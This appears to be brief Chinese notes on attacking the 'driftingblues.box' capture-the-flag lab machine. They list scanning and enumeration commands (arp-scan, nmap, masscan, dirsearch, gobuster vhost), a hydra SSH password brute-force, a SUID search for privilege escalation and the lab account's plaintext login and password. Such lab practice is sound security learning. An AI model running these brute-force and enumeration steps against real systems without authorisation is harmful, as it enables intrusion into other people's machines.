信息收集
主机扫描
arp-scan -I eth0 -l
端口扫描
nmap -A -sV -T4 -p- ipaddr -v
masscan ip/24 -p 80,22
目录遍历
dirsearch -u http://ipaddr
子域名爆破
gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt
这里是多个域名对应一个ip地址。
因此直接用ip地址是无法访问到driftingblues.box的,同理test.driftingblues.box。于是必须要设置host文件,使kali能够把域名解析成ip地址,再用域名访问,才能成功。
一开始gobuster失效也是由于driftingblues.box 无法解析
vim etc/hosts
/usr/share/wordlist
密码爆破
hydra -l eric -P pass.txt 192.168.9.24 ssh
ssh登录成功
ssh eric@192.168.192.140
提权(未完待续)
suid
find / -user root -perm -4000 -print 2>/dev/null
账号密码
login: eric
password: 1mw4ckyyucky6